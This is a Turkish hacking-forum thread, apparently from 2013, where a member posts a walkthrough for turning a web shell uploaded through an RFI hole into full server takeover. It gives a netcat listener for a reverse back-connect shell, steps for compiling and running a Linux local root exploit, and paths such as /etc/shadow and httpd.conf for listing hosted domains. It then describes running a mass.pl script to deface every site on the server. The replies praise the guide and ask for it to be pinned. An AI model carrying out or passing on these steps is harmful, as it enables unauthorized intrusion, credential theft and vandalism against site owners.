THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Serveri Hacklemek / Anlatım /

AydynYlmz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Nereden:
İstanbul
Mesajlar:
236
Konular:
41
Teşekkür (Etti):
27
Teşekkür (Aldı):
37
Ticaret:
(0) %
09-06-2013 22:46
#1
Serveri Hacklemek / Anlatım /
herkes shell ile web sitesi hackliyor artık hemen hemen bütün basit sitelerde RFI denilen açıklardan var. peki bu basit portal sitelerinden yola çıkarak neler yapılır dersiniz.?

herhangi bri web sitene yedirmiş oldugumuz shell(c99 r57 bypass vs vs.) ile bütün SERVER ı ele geçirmek mümkün.

®BUNU UYGULAMALI YAPALIM®

ÖN HAZIRLIK:

öncelikle yedirmiş oldugumuz shell üzerinden yola çıkarak server elegeçiriyoruz.

öncelikle bir siteye c99 baglandı isek bu siteye index atmadan önce r57 txt de açıp kaydederken .php diye kaydediyoruz bilgisayarımıza.

daha sonra c99 banladıgımız siteye upload bölümünde r57.php upload ediyoruz. upload ettigimiz r57.php açıyoruz.

burası bir kenarda dursun işimdi diyer hazırlıkları yapalım:

modemimizde port açmamız gerekecek şimdi modem ayarlarından herhan gibir (6589) port açıyor.

netcat denen ufak bir programı nidiriyoruz ve pcmizde system32 açıyoruz.

®HAZIRLIK TAMAM UYGULAMAYA GEÇİYORUZ®

şimdi ön hazırlıkları tamamladık

yukarda r57.php upload ettigimiz siteye gidip upload edilin l ink üzerinden r57 çalıştıroyoruz.

daha sonra başlat/çalıştır/cmd

diyiyoruz karşımıza glen ekranda nc -vv -l port no yazıyoruz ve karşımza listening any 6589... diye bri yazı gelecek bunu oldugu gibi bırakıyoruz ve tekrar hedef siteye dönüyoruz.
r57.php baglanılmış siteni el altında back connect seçenegi var ordaki port yazılı olan yeri silip biraz önce netcat ile verdgimizi komuttaki potu yazıyoruz ve connect diyoruz.

biraz bekledikten sonra yukarda verdigimiz listening any 6589... altında connect to 10.0.0.2 server.hedefsite.com ve server sürümü karşımza geliyor. evet artık server girdik artık bütün serverda istedigimiz yapacagız.

PEKİ NASIL :

şimdi yukardaki yazıda server sürümü atıyorum linux 2.6.14 olsun

herhangi bir exploit sitesinden bu exploit bulup bilisayarımıza (isim).c diye kaydediyoruz. burdaki eexploit adımız root olsun.

daha sonra siteye r57.php upload eder gibi root.c upload ediyoruz.

yine ms dos ekranımıza dönüp ls yazıp enter diyoruz. ve karşımza exploit yazılı oldugu bbölge geliyor örnegin (linux2.6.14.c) devam ediyoruz

gcc -o root root.c diyoruz.DİKKAT BİRİNCİ YAZDIGIMIZ SONUNDA .C YOK.
ls tekrar yazdımızda busefer karşımıza alt alta iki tane root yazsısı geliyor. birinci root.c ikinsi ise root

bu demek oluyorki exploit derlendi kullanıma hazır.

chmod 777 root diyoruz. (bunu dememizdeki amaç serverda exploit tam yetki saglamak)

./root deyip exploit çalıştırıyoruz. ve beklemeye koyuluyoruz.

biraz bekledikten sonra uid-0(root) gid-0(root)... yazılar gelecek. EVET ARTIK SERVER LOCAL OLARAK BAGLANDIK VE SİSTEMİ TAMAMEN ELE GEÇİRDİK

ŞİMDİ BAKALIM BU SEVERDA KAÇ TANE DOMAİN VAR.

domainlere bakacagımız dinler


/etc/httpd/conf/httpd.conf

/var/cpanel

etc/shadow
/var/named



bu dizinlerden cd/etc/httpd/conf/httpd.conf geçiyoruz(yukardakdizinlerden başkarına geçiş yapabilirsiniz illa bu dizinde oalcak diye brişey yok)

ls ve serverdaki main listesine ulaşıyoruz.

EVET ARTIK BÜTÜN SERVER İNDEX ATALIMMI

DEVAM EDİYORUZ

şimdi bize buiş için gerekli olan mass.pl adında bir perl exploit bu exploit de yukarda r57.php upload ettigmiz dizine upload ediyoruz.

r57ekranın en üstündeki pwd deki yazıları kopyalıyoruz (/home/public vs vs gibi yazılar)

yine msdos da kaldıgımız yerde

cd pwp deki uzantıyı yazıp enter diyoruz

perl mass.pl yazıp enter deyip çalıştıriyoruz. exploit baglanırken önceden hazırlamış oldugumuz index i en başta r57.php upload ettgiimiz yerede index.html şeklinde upload ediyoruz.

upload işlemi bittikten sorna

ms dosa kaldımız yere

perl mass.pl pwd deki yazıları kopyalıyoruz (/home/public vs vs gibi yazılar)

enter diyoruz ve artık bütün siteye index atmış olduk.

_____________________GEREKLİ DÖKÜMANLAR_________________

ACTİVE PERL. MASS.PL NETCAT

Alıntıdır.
AydynYlmz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Nereden:
İstanbul
Mesajlar:
236
Konular:
41
Teşekkür (Etti):
27
Teşekkür (Aldı):
37
Ticaret:
(0) %
09-06-2013 23:20
#2
Güncel//
SlimeDont - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
12/2012
Mesajlar:
805
Konular:
199
Teşekkür (Etti):
11
Teşekkür (Aldı):
62
Ticaret:
(0) %
10-06-2013 01:47
#3
Güzel anlatım olmuş renki farklı yaparsan daha iyi olabilir.
OV3RNIGHT - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2012
Nereden:
Tekirdağ
Mesajlar:
695
Konular:
47
Teşekkür (Etti):
110
Teşekkür (Aldı):
74
Ticaret:
(0) %
10-06-2013 05:44
#4
Yararlı Konu
Vıdeolu ,
Resimli Anlatım Yaparsan ve Emek Verirsen Sabite Alınır.
Fikrim :
Sabite Alınmalı //

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler